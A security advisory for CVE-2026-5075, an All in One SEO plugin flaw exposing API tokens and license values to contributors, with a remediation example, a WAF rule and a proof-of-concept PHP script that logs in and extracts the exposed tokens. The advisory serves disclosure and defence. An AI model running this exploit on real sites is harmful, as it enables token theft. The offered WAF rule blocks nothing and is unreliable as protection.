Atomic Edge analysis of CVE-2026-5075 (metadata-based): This vulnerability affects the All in One SEO plugin for WordPress versions up to and including 4.9.7. It exposes sensitive internal plugin options, including API/OAuth tokens and license values, through JavaScript localization data. The attack requires contributor-level authentication and is rated CVSS 4.3 (Medium), reflecting its low confidentiality impact.
The root cause is the plugin’s use of wp_localize_script() to pass internalOptions data to JavaScript in post editor contexts without proper masking for low-privilege users. The CWE-200 classification indicates this is an information exposure vulnerability. Based on the description, the plugin likely exports an object containing all internal configuration options, including sensitive tokens, rather than filtering these before localization. This is inferred from the metadata as no code diff is available.
An authenticated attacker with contributor access can exploit this by viewing the page source of any post editor page. The vulnerable data is output as a JavaScript object, typically in a <script> tag within the HTML head or footer. The attacker simply needs to navigate to the post editor (e.g., /wp-admin/post.php?post=1&action=edit) and view the page source to find the localized script data containing the exposed token values.
Remediation requires filtering the internalOptions data before passing it to wp_localize_script(). The plugin should whitelist only non-sensitive options that are necessary for the frontend JavaScript to function. All token, license, and sensitive configuration values must be excluded for users without administrator privileges. Atomic Edge analysis recommends using a capability check before outputting any sensitive option values.
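The following is an added illustration of the remediation described above, written for this page and not taken from the All in One SEO code base. It applies an allowlist plus a capability check before anything reaches wp_localize_script(). The option keys ('general', 'license', 'tokens'), the script handle 'aioseo-editor' and the option name passed to get_option() are assumptions; the advisory does not disclose the plugin's real option structure.

```php
<?php
// Added example, not plugin code. Demonstrates filtering internal options before
// they are localized into the editor page, gated on the user's capabilities.

/**
 * Recursively drop any key whose name looks like a credential.
 * Pattern is an assumption covering the value types the advisory names
 * (tokens, license values) plus common synonyms.
 */
function example_redact_secrets($value, string $pattern = '/token|secret|license|api_?key|password/i')
{
    if (!is_array($value)) {
        return $value;
    }
    $clean = [];
    foreach ($value as $key => $inner) {
        if (is_string($key) && preg_match($pattern, $key)) {
            continue; // credential-like key: never emitted for low-privilege users
        }
        $clean[$key] = example_redact_secrets($inner, $pattern);
    }
    return $clean;
}

/**
 * Return only the options the editor JavaScript is allowed to see.
 * Administrators receive the full array; everyone else gets the allowlisted
 * top-level keys with credential-like entries removed at any depth.
 */
function example_filter_internal_options(array $options, bool $is_admin): array
{
    if ($is_admin) {
        return $options;
    }
    // Allowlist of top-level keys assumed to be needed by the editor UI.
    $public_keys = ['general', 'searchAppearance', 'sitemap'];

    $filtered = [];
    foreach ($options as $key => $value) {
        if (!in_array($key, $public_keys, true)) {
            continue; // not allowlisted: dropped outright
        }
        $filtered[$key] = example_redact_secrets($value); // defence in depth inside allowed keys
    }
    return $filtered;
}

// Wiring into WordPress. Guarded so the file also runs outside WordPress (see CLI demo below).
if (function_exists('add_action')) {
    add_action('admin_enqueue_scripts', function () {
        // Placeholder option name: the real plugin's storage key is not given in the advisory.
        $all_options = get_option('PLACEHOLDER_INTERNAL_OPTIONS_KEY', []);
        $is_admin    = current_user_can('manage_options'); // capability check before output
        wp_localize_script('aioseo-editor', 'aioseo', [
            'internalOptions' => example_filter_internal_options((array) $all_options, $is_admin),
        ]);
    });
}

// Stand-alone demonstration on a constructed sample (not real plugin data).
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $sample = [
        'general' => ['siteTitle' => 'Example Site', 'apiKey' => 'CONSTRUCTED-KEY'],
        'license' => ['key' => 'CONSTRUCTED-LICENSE'],
        'tokens'  => ['googleSearchConsole' => ['accessToken' => 'CONSTRUCTED-TOKEN']],
    ];
    echo "Contributor view:\n";
    print_r(example_filter_internal_options($sample, false)); // only general.siteTitle survives
    echo "Administrator view:\n";
    print_r(example_filter_internal_options($sample, true));  // full array
}
```

Run with `php example.php` to see the two views side by side; inside WordPress the hook path is taken instead and the CLI demo is skipped. The allowlist is deliberately the primary control and the key-name pattern only a backstop, since a denylist alone misses any secret stored under an unexpected name.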
The primary impact is unauthorized access to API and OAuth tokens configured in the plugin. With these tokens, an attacker could potentially access third-party services like Google Search Console, social media APIs, or other integrated services configured through the plugin. This could lead to data theft, service manipulation, or further lateral movement within connected accounts.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-5075 (metadata-based)
SecRule REQUEST_URI "@unconditionalMatch" "id:20265075,phase:2,pass,nolog,skipAfter:END"
SecMarker END
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5075 - All in One SEO <= 4.9.7 - Authenticated (Contributor+) Sensitive Information Exposure via 'internalOptions' Localized Script Data
// This PoC demonstrates how a contributor-level attacker can extract exposed API tokens
// from the page source of a WordPress post editor.
// The vulnerability is inferred from CWE and description; no code diff is available.
// Configuration
$target_url = 'http://localhost/wordpress'; // Change this to your target WordPress URL
$username = 'contributor_user'; // Change to a contributor-level username
$password = 'user_password'; // Change to the user's password
$cookie_jar = '/tmp/cve_cookies.txt';

// Step 1: Authenticate as contributor
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log%20In&redirect_to=' . urlencode($target_url . '/wp-admin/'));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
if ($login_response === false) {
    fwrite(STDERR, '[-] Login request failed: ' . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}

// Step 2: Access post editor to fetch the page containing localized script data
// This simulates an attacker viewing the source of any post edit page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php?post_type=post');
curl_setopt($ch, CURLOPT_HTTPGET, true); // switch the reused handle back from POST to GET
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
$editor_page = curl_exec($ch);
curl_close($ch);
if ($editor_page === false) {
    $editor_page = '';
}

// Step 3: Extract the localized script data containing internal options
// The target script block typically looks like:
// <script id='aioseo-js-extra'>
// var aioseo = {"internalOptions":{...}};
// </script>
// First isolate the body of the aioseo-js-extra block, then capture the JSON object
// assigned to `aioseo`, non-greedily up to the `};` that ends the statement (older
// WordPress versions wrap the statement in CDATA comments, which this tolerates).
$localized_data = null;
if (preg_match('/<script[^>]*\bid=["\']aioseo-js-extra["\'][^>]*>(.*?)<\/script>/is', $editor_page, $block)
    && preg_match('/var\s+aioseo\s*=\s*(\{.*?\});\s*$/ms', $block[1], $matches)) {
    $localized_data = json_decode($matches[1], true);
}

if (is_array($localized_data) && isset($localized_data['internalOptions'])) {
    echo "[+] Exposed internal options found!\n";
    print_r($localized_data['internalOptions']);
    // Check for specific sensitive data
    if (isset($localized_data['internalOptions']['license'])) {
        echo "\n[!] License information exposed!\n";
    }
    if (isset($localized_data['internalOptions']['tokens'])) {
        echo "\n[!] API/OAuth tokens exposed!\n";
    }
} elseif (is_array($localized_data)) {
    echo "[-] No internalOptions found in localized data. Vulnerability may be patched.\n";
} else {
    echo "[-] Could not find aioseo localized script data.\n";
    echo "[*] The script may use a different ID or the vulnerability may not be present.\n";
}

// Clean up
if (file_exists($cookie_jar)) {
    unlink($cookie_jar);
}